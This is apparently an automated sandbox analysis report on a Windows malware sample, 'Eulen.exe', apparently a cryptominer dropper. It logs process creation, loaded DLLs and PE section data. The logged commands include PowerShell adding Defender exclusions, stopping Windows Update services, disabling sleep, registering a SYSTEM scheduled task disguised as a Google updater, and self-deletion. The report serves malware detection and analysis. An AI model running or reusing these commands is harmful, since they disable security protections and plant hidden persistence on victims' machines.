          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Eulen.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe "C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
          Source: C:\Windows\System32\dialer.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\dialer.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Eulen.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvcJump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Eulen.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvcJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvcJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauservJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bitsJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvcJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe "C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeProcess created: unknown unknown
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\choice.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeDirectory created: C:\Program Files\Google\Libs
          Source: Eulen.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: Eulen.exeStatic file information: File size 44977152 > 1048576
          Source: Eulen.exeStatic PE information: Raw size of .D6u is bigger than: 0x100000 < 0x2ae3800
          Source: Eulen.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Diagnostics.pdb source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbx source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ~1.PDB @7_9)ux source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error3)y source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb04 source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: mp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorV)y source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\symsrv.dllp.pdb source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
          Source: C:\Users\user\Desktop\Eulen.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
          Source: initial sampleStatic PE information: section where entry point is pointing to: .D6u
          Source: Eulen.exeStatic PE information: section name: .xdata
          Source: Eulen.exeStatic PE information: section name: .@yC
          Source: Eulen.exeStatic PE information: section name: .j]_
          Source: Eulen.exeStatic PE information: section name: .+.:
          Source: Eulen.exeStatic PE information: section name: .D6u
          Source: ChromeUpdater.exe.0.drStatic PE information: section name: .xdata
          Source: ChromeUpdater.exe.0.drStatic PE information: section name: .@yC
          Source: ChromeUpdater.exe.0.drStatic PE information: section name: .j]_
          Source: ChromeUpdater.exe.0.drStatic PE information: section name: .+.:
          Source: ChromeUpdater.exe.0.drStatic PE information: section name: .D6u
          Source: auqpbnqlvfdv.tmp.39.drStatic PE information: section name: _RANDOMX
          Source: auqpbnqlvfdv.tmp.39.drStatic PE information: section name: _TEXT_CN
          Source: auqpbnqlvfdv.tmp.39.drStatic PE information: section name: _TEXT_CN
          Source: auqpbnqlvfdv.tmp.39.drStatic PE information: section name: _RDATA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFB4AF1D2A5 pushad ; iretd 15_2_00007FFB4AF1D2A6
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFB4AF1DA86 push edi; ret 15_2_00007FFB4AF1DA87
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFB4B037BD3 push eax; ret 15_2_00007FFB4B037BA9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFB4B033AD3 pushad ; ret 15_2_00007FFB4B033AD9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFB4B037B9A push eax; ret 15_2_00007FFB4B037BA9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFB4B0311BD pushad ; ret 15_2_00007FFB4B031202
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFB4B03B8FB pushad ; iretd 15_2_00007FFB4B03B969
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFB4B037127 push esp; retf 15_2_00007FFB4B037128
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFB4B03754D push ebx; iretd 15_2_00007FFB4B03756A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFB4B103730 push eax; ret 15_2_00007FFB4B103731
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E9917322B8 push rdx; retf 19_2_000002E9917322B9
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E9917384FD push rcx; retf 003Fh19_2_000002E9917384FE
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991763130 push rbp; retf 19_2_000002E991763133
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991763138 push rsi; retf 19_2_000002E991763143
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991763100 push rbp; retf 19_2_000002E99176310B
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991763100 push rbp; retf 19_2_000002E99176310B
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E9917630E0 push r14; retf 19_2_000002E9917630EB
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991763180 push rbp; retf 19_2_000002E991763183
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991763180 push rbp; retf 19_2_000002E9917631E3
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991763168 push rbp; retf 19_2_000002E99176316B
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991763038 push r14; retf 19_2_000002E991763043
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991763008 push rsi; retf 19_2_000002E99176302B
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E9917630A8 push rbp; retf 19_2_000002E9917630AB
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991763080 push rbp; retf 19_2_000002E991763083
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991763070 push rbp; retf 19_2_000002E991763073
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991763078 push rbp; retf 19_2_000002E991763083
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991763238 push rbp; retf 19_2_000002E99176323B
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991763218 push rbp; retf 19_2_000002E99176321B
